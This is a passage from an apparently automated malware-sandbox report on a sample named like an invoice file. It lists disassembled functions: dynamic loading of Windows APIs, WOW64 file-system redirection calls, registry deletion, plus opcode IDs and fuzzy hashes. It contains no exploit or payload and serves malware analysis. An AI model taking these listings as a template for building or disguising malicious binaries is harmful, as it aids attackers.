                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004FA482
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004FA48F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 04ecb9911207d2838693d12479c7eec9d25b18c44aecc0d14b94bf0798bea207
                                                                                                                • Instruction ID: baa119fe459011bc254ff2e095dd395f12974e9891b93d7d2c02971aad2b7a6b
                                                                                                                • Opcode Fuzzy Hash: 04ecb9911207d2838693d12479c7eec9d25b18c44aecc0d14b94bf0798bea207
                                                                                                                • Instruction Fuzzy Hash: 2E11E7B1240208BEEF209F65CC49FEB3B69EF89758F014119FB4996191D6B5E821DB28
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004B22A1
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004B22A8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                • API String ID: 2574300362-340411864
                                                                                                                • Opcode ID: ff4b7fbdbf28536fa7bdbb1794bdd1ef3ba34ade133508ac3c46c368e57a9532
                                                                                                                • Instruction ID: 86669a7bff5941bca16a3307ff484c6ef1bd29087afb1607d3fd4076ae7cc9e8
                                                                                                                • Opcode Fuzzy Hash: ff4b7fbdbf28536fa7bdbb1794bdd1ef3ba34ade133508ac3c46c368e57a9532
                                                                                                                • Instruction Fuzzy Hash: 22E01A74AD4700ABEB505F70ED4EBD53A65BB21706F105060B102D51E0DBB94088EF2A
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004B2276), ref: 004B2376
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004B237D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 2574300362-2819208100
                                                                                                                • Opcode ID: 000bc752dbad0c3754921fe01b119597c66dc63623f00f1387cb38ac82733596
                                                                                                                • Instruction ID: 76290859129b1f5b65c279c0f04186678fd1a306079a878c602af796c675fc5d
                                                                                                                • Opcode Fuzzy Hash: 000bc752dbad0c3754921fe01b119597c66dc63623f00f1387cb38ac82733596
                                                                                                                • Instruction Fuzzy Hash: 26E0B674588700ABEBA05F70ED1DB853AB5B731706F106414F90AD21F0DBBD5448EA26
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: eeb9b67e69caaa1b29ccb92961810ffd5eb6f0504fdf34d6d66316c13bc546bf
                                                                                                                • Instruction ID: 2713664b5613d1c2a96d5e87bc31b39c6b0d732b9a6c7f16811e2b9e78199356
                                                                                                                • Opcode Fuzzy Hash: eeb9b67e69caaa1b29ccb92961810ffd5eb6f0504fdf34d6d66316c13bc546bf
                                                                                                                • Instruction Fuzzy Hash: DEE012B1804B58DBDB109790CD05DFE777CB704741F510893F907A2090D7399F85AA27
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,004F21FB,?,004F23EF), ref: 004F2213
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 004F2225
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                                                • API String ID: 2574300362-399901964
                                                                                                                • Opcode ID: 01605ea07477826b81b6e32303f7313fa97987ba2395325f52d229c3275b4b40
                                                                                                                • Instruction ID: 5eb62cfce39cddb1782e795f5c537c330d723ae523e6877bc7a22db45687f730
                                                                                                                • Opcode Fuzzy Hash: 01605ea07477826b81b6e32303f7313fa97987ba2395325f52d229c3275b4b40
                                                                                                                • Instruction Fuzzy Hash: 00D0A734840726AFD7254F30F9086D27AE8FB14304F01885EE841E2290E7B4D884DA70
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004942EC,?,004942AA,?), ref: 00494304
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494316
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: ba147e5d8c9eeda2c50b1e5a4b7c248cb66754bb73912cd0e5a487edf5dfca79
                                                                                                                • Instruction ID: 53f026b001b53d12a4f6a5a9677ae91a28ea15bdd8b36de8a793b6d44303dc7f
                                                                                                                • Opcode Fuzzy Hash: ba147e5d8c9eeda2c50b1e5a4b7c248cb66754bb73912cd0e5a487edf5dfca79
                                                                                                                • Instruction Fuzzy Hash: 63D0A730540722AFCB344F30E80CE827EE8BB18305F00842AE841D2260D7B4D884CA20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,004941BB,00494341,?,0049422F,?,004941BB,?,?,?,?,004939FE,?,00000001), ref: 00494359
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0049436B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 3a71b37ae4f46434c30acf97e88ba1d78f313e60660aa5c1db53c12b10650966
                                                                                                                • Instruction ID: fb69a552d2c330c83c1f53e79a8c95a111dc1bcce87b6fd33b7f5e71f7ba65b3
                                                                                                                • Opcode Fuzzy Hash: 3a71b37ae4f46434c30acf97e88ba1d78f313e60660aa5c1db53c12b10650966
                                                                                                                • Instruction Fuzzy Hash: 60D0A730544722AFCB344F30E808A867EE8BB70719F00842AE881D2250D7B4D884CA20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004D052F,?,004D06D7), ref: 004D0572
                                                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004D0584
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1587604923
                                                                                                                • Opcode ID: 6b8d2642344857b1e0e5be013fab7210c27d497111af21f89ec3fd414df901c5
                                                                                                                • Instruction ID: 6073907816734f0c239cc25ad196589c0dbd6e7353cfc480cb90434f3fa80316
                                                                                                                • Opcode Fuzzy Hash: 6b8d2642344857b1e0e5be013fab7210c27d497111af21f89ec3fd414df901c5
                                                                                                                • Instruction Fuzzy Hash: BED09E70944722BAD7209F65A819B827BF4AB14715F90891BEC55D2350E674D488CA60
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,004D051D,?,004D05FE), ref: 004D0547
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004D0559
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1071820185
                                                                                                                • Opcode ID: ebeaabbb26c2c2f7ce9339dafd712644fbd88fd9a55c061ef1d142f5c21f7124
                                                                                                                • Instruction ID: 0abcf62d9cf6b7b9fb45dad2aaacf0ce58f598a67132105768cc2fefc724080d
                                                                                                                • Opcode Fuzzy Hash: ebeaabbb26c2c2f7ce9339dafd712644fbd88fd9a55c061ef1d142f5c21f7124
                                                                                                                • Instruction Fuzzy Hash: 6FD09E70544722BED720DB65A8196827AB4AB14755FD0C41BE856D2350E674C888CA60
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,004EECBE,?,004EEBBB), ref: 004EECD6
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004EECE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                • Opcode ID: 0ae6a0887708aa9aee97914db5bcc5f341e51dd8e4ab88312e050f5729fe66fd
                                                                                                                • Instruction ID: 6a6a6c0d18d3a209053136e960b8febd54c7157cb3305c3a2322541429810554
                                                                                                                • Opcode Fuzzy Hash: 0ae6a0887708aa9aee97914db5bcc5f341e51dd8e4ab88312e050f5729fe66fd
                                                                                                                • Instruction Fuzzy Hash: CBD0A770440733AFCB245F72E8487837AF8BB10305F10C41AF84AD2250DB74C884DA20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004EBAD3,00000001,004EB6EE,?,0052DC00), ref: 004EBAEB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004EBAFD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                • Opcode ID: 5beb2661f6b2d5596052c39c220defd02a098f155426968ee0066804ba60bd76
                                                                                                                • Instruction ID: 1f443724e961bc10fd8ea420737ea05d156f6b7db10009e16a762550348afb2a
                                                                                                                • Opcode Fuzzy Hash: 5beb2661f6b2d5596052c39c220defd02a098f155426968ee0066804ba60bd76
                                                                                                                • Instruction Fuzzy Hash: 9FD0A730840B22EFC7349FA1E84CB937AECFB10305F00841AE847D2650D774D884DA64
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,004F3BD1,?,004F3E06), ref: 004F3BE9
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004F3BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: d0541434c30246dad9d9e1a87015bfeaed8f8e46207d4a6a476b9ffa702fbb39
                                                                                                                • Instruction ID: a814dba3a226c49df88c67194bb4993eba612eda3f490a5081236dc1a08e16fa
                                                                                                                • Opcode Fuzzy Hash: d0541434c30246dad9d9e1a87015bfeaed8f8e46207d4a6a476b9ffa702fbb39
                                                                                                                • Instruction Fuzzy Hash: 77D0A7F1480756AFC7205F60E808793BEF4BB11319B11841AE445E2250D6B4C484CE20
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5c9905c3dce90ab002b26af8044c6ef39a3f1075789d86a6e3a6d586bbf1713
                                                                                                                • Instruction ID: 9a70059eb4e1a67efaf5336f9b9f4e2fd5c4c1d6ccf180d636997e7f43272af9
                                                                                                                • Opcode Fuzzy Hash: f5c9905c3dce90ab002b26af8044c6ef39a3f1075789d86a6e3a6d586bbf1713
                                                                                                                • Instruction Fuzzy Hash: FDC13A79A0021AEBCB54CF94C888FAEB7B5FF48704F10459DE906AB291D734EE41DB94
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 004EAAB4
                                                                                                                • CoUninitialize.COMBASE ref: 004EAABF
                                                                                                                  • Part of subcall function 004D0213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004D027B
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004EAACA
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004EAD9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: 06949ba232a77abd11a9a972b05484aecc6762e9df530bc915f923a91cd07264
                                                                                                                • Instruction ID: 88708d4f9403dd185235571a3c7cea86fc8c899d1e9a9c411690176f3b790a19
                                                                                                                • Opcode Fuzzy Hash: 06949ba232a77abd11a9a972b05484aecc6762e9df530bc915f923a91cd07264
                                                                                                                • Instruction Fuzzy Hash: 13A148352047419FCB10DF26C881A1AB7E5BF98315F14845EFA969B3A1CB39FD05CB8A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2808897238-0
                                                                                                                • Opcode ID: 0bed6eb8de13429f941b3a5287414bc0484d26afbe4b0f26fdb7c8e9f2d187f2
                                                                                                                • Instruction ID: d03f457ee589836ae8b54fbd148e2532de90cbeb91257d17b52d092a7d3e3b74
